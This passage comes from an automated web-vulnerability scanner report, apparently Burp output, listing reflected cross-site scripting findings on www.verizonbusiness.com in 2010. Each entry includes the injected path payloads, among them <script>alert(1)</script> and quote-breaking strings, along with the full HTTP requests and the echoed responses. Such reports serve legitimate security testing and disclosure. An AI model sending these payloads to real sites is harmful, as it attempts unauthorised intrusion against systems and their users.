<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a1a4-111-Education.xml638b2</script><script>alert(1)</script>930eacbee47</url>
...[SNIP]...

1.564. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a4-111-Education.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88e74'%3b271529db7b8 was submitted in the REST URL parameter 2. This input was echoed as 88e74';271529db7b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/88e74'%3b271529db7b8 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/88e74';271529db7b8'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.565. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a5-111-Government.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fd87'%3b84badb62bc0 was submitted in the REST URL parameter 1. This input was echoed as 1fd87';84badb62bc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources1fd87'%3b84badb62bc0/1002a1a5-111-Government.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources1fd87';84badb62bc0/1002a1a5-111-Government.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.566. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a5-111-Government.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffbf"%3b32e89247ea2 was submitted in the REST URL parameter 1. This input was echoed as 7ffbf";32e89247ea2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7ffbf"%3b32e89247ea2/1002a1a5-111-Government.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:19:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources7ffbf";32e89247ea2/1002a1a5-111-Government.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.567. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a5-111-Government.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa795</script><script>alert(1)</script>5f1abd8099b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a5-111-Government.xmlaa795</script><script>alert(1)</script>5f1abd8099b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d340538f60a0b9333915b09a41ea9c85"
Last-Modified: Wed, 17 Nov 2010 00:22:33 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3db6ba3563-55e5-4e0c-8f9c-089cf063d496|VTID%3d5fce2f6b-6796-47f7-9448-851079c4e02f|SX%3d1289954552|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:26:16 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:33 GMT
Content-Length: 52487

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a1a5-111-Government.xmlaa795</script><script>alert(1)</script>5f1abd8099b</url>
...[SNIP]...

1.568. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a5-111-Government.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b0c2'%3bbb7a8cb1aba was submitted in the REST URL parameter 2. This input was echoed as 8b0c2';bb7a8cb1aba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/8b0c2'%3bbb7a8cb1aba HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/8b0c2';bb7a8cb1aba'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.569. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a6-111-Retail.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44b01"%3b9f30837d83d was submitted in the REST URL parameter 1. This input was echoed as 44b01";9f30837d83d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources44b01"%3b9f30837d83d/1002a1a6-111-Retail.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources44b01";9f30837d83d/1002a1a6-111-Retail.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.570. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a6-111-Retail.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84224'%3b99ba7759ed6 was submitted in the REST URL parameter 1. This input was echoed as 84224';99ba7759ed6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources84224'%3b99ba7759ed6/1002a1a6-111-Retail.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources84224';99ba7759ed6/1002a1a6-111-Retail.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.571. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a6-111-Retail.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e93a8'%3bb2f3f707bb6 was submitted in the REST URL parameter 2. This input was echoed as e93a8';b2f3f707bb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/e93a8'%3bb2f3f707bb6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/e93a8';b2f3f707bb6'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.572. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a6-111-Retail.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2e8</script><script>alert(1)</script>66a96c5beb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a6-111-Retail.xmlef2e8</script><script>alert(1)</script>66a96c5beb9 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "05fcc58cf2564d35ff1f44cfcfb938ce"
Last-Modified: Wed, 17 Nov 2010 00:21:49 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d780ea2ca-2134-471c-9c87-83fa5465c8ad|VTID%3dee55a3ba-ddb2-4d2d-ae86-b58967f38085|SX%3d1289954509|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:33 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:49 GMT
Content-Length: 36530

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a1a6-111-Retail.xmlef2e8</script><script>alert(1)</script>66a96c5beb9</url>
...[SNIP]...

1.573. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a7-111-Energy+and+Utilities.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f51a"%3b62577d24586 was submitted in the REST URL parameter 1. This input was echoed as 4f51a";62577d24586 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources4f51a"%3b62577d24586/1002a1a7-111-Energy+and+Utilities.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources4f51a";62577d24586/1002a1a7-111-Energy+and+Utilities.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.574. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a7-111-Energy+and+Utilities.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8e5d'%3bf3827fd452d was submitted in the REST URL parameter 1. This input was echoed as f8e5d';f3827fd452d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf8e5d'%3bf3827fd452d/1002a1a7-111-Energy+and+Utilities.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesf8e5d';f3827fd452d/1002a1a7-111-Energy+and+Utilities.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.575. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a7-111-Energy+and+Utilities.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7e0</script><script>alert(1)</script>4eebb40e7f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a7-111-Energy+and+Utilities.xml3e7e0</script><script>alert(1)</script>4eebb40e7f5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "dfdebcd27bdbe3054feaff59ee9b0068"
Last-Modified: Wed, 17 Nov 2010 00:22:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:02 GMT
Content-Length: 32254
Connection: close
Set-Cookie: BERT=VRID%3ddde4d1bd-ee75-40ec-82b0-72c174b20aa9|VTID%3debeff2aa-88f9-4ad4-b8e4-c3e960a37568|SX%3d1289954522|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:46 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a1a7-111-Energy+and+Utilities.xml3e7e0</script><script>alert(1)</script>4eebb40e7f5</url>
...[SNIP]...

1.576. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a7-111-Energy+and+Utilities.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c56bd'%3b87f7b6050ac was submitted in the REST URL parameter 2. This input was echoed as c56bd';87f7b6050ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c56bd'%3b87f7b6050ac HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:03 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
